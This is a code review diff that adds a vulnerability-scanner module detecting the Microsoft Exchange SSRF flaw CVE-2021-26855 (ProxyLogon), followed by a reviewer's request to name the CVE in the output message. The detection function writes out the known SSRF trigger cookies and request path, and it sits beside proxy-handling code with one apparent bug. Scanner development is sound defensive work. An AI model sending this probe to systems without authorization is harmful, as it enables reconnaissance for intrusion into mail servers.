lib/vuln/msexchange_cve_2021_26855/engine.py

```diff
@@ -0,0 +1,181 @@
+                'socks5://') else socks.SOCKS4
+            socks_proxy = socks_proxy.rsplit('://')[1]
+            if '@' in socks_proxy:
+                socks_username = socks_proxy.rsplit(':')[0]
+                socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
+                socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
+                                        int(socks_proxy.rsplit(':')[-1]), username=socks_username,
+                                        password=socks_password)
+                socket.socket = socks.socksocket
+                socket.getaddrinfo = getaddrinfo
+            else:
+                socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]),
+                                        int(socks_proxy.rsplit(':')[1]))
+                socket.socket = socks.socksocket
+                socket.getaddrinfo = getaddrinfo()
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sys.stdout.flush()
+        s.settimeout(timeout_sec)
+        s.connect((targ, port))
+        return s
+    except Exception as e:
+        return None
+
+
+def msexchange_vuln(target, port, timeout_sec, log_in_file, language, time_sleep,
+                   thread_tmp_filename, socks_proxy, scan_id, scan_cmd):
+    try:
+        s = conn(target, port, timeout_sec, socks_proxy)
+        if not s:
+            return False
+        else:
+            if target_type(target) != "HTTP" and port == 443:
+                target = 'https://' + target
+            if target_type(target) != "HTTP" and port == 80:
+                target = 'http://' + target
+            cookies = {
+                "X-AnonResource": "true",
+                "X-AnonResource-Backend": "localhost/ecp/default.flt?~3",
+                "X-BEResource": "localhost/owa/auth/logon.aspx?~3",
+            }
+            if target.endswith("/"):
+                target = target[:-1]
+            path = '/owa/auth/x.js'
+            req = requests.get(target + path, cookies=cookies)
+            try:
+                global header_server
+                header_server = req.headers['x-calculatedbetarget']
+                if header_server == 'localhost':
+                    return True
+                else:
+                    return False
+            except:
+                return False
+    except Exception as e:
+        # some error warning
+        return False
+
+
+def __msexchange_vuln(target, port, timeout_sec, log_in_file, language, time_sleep,
+                     thread_tmp_filename, socks_proxy, scan_id, scan_cmd):
+    if msexchange_vuln(target, port, timeout_sec, log_in_file, language, time_sleep,
+                      thread_tmp_filename, socks_proxy, scan_id, scan_cmd):
+        info(messages(language, "target_vulnerable").format(target, port,
+                                                            'Exchange Server SSRF Vulnerability'))
```

Comment:
@ktg-123  please add the CVE number to the message (there are many SSRf vulns in MS Exchange) so it looks like this:
`'Exchange Server SSRF Vulnerability CVE-2021-26855'`